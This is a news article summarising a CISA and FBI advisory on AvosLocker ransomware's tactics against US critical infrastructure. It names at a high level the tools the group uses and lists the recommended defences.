In the latest revelation from the cybersecurity frontlines, the Avoslocker ransomware gang has once again emerged as a significant threat, this time targeting Critical Infrastructure sectors in the United States. A joint advisory by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) sheds light on the gang’s sophisticated tactics, techniques, and procedures (TTPs).
Related Articles
Open-Source Shadows and Living-Off-The-Land Prowess
AvosLocker affiliates exhibit a distinct modus operandi, infiltrating organizations through the cunning use of legitimate software and open-source remote administration tools. Unlike conventional ransomware, they employ exfiltration-based data extortion tactics, threatening to leak or publish stolen data. Notably, the AvosLocker strain, born in mid-2021, boasts a cross-platform reach, affecting Windows, Linux, and VMware ESXi environments.
Tools of the Trade
A hallmark of AvosLocker attacks is their reliance on open-source tools and living-off-the-land (LotL) tactics, ensuring minimal traces for attribution. Familiar utilities like FileZilla and Rclone are repurposed for data exfiltration, while tunneling tools like Chisel and Ligolo play a crucial role. Command-and-control is orchestrated through Cobalt Strike and Sliver, with Lazagne and Mimikatz leading the charge in credential theft.
New Components and Strategies
Adding to their arsenal, AvosLocker introduces custom web shells for network access and an executable, NetMonitor.exe, disguising itself as a benign network monitoring tool while functioning as a reverse proxy. This enables threat actors to connect to the host from outside the victim’s network, adding a layer of sophistication to their attack vector.
Recommendations for Critical Infrastructure
In response to this escalating threat, CISA and the FBI advocate crucial mitigations for critical infrastructure organizations. These include application controls, limited use of remote desktop services, restrictions on PowerShell usage, mandatory phishing-resistant multi-factor authentication, network segmentation, regular system updates, and maintaining periodic offline backups.
The Ransomware Surge of 2023: A Grim Reality
The cybersecurity landscape of 2023 is witnessing a surge in ransomware attacks, with threat actors deploying their malicious payloads within hours of initial access. Secureworks reports a drastic reduction in median dwell time, indicating a shift towards simpler and quicker operations to evade detection. Exploitation of public-facing applications, stolen credentials, off-the-shelf malware, and external remote services emerge as the primary vectors for these insidious attacks.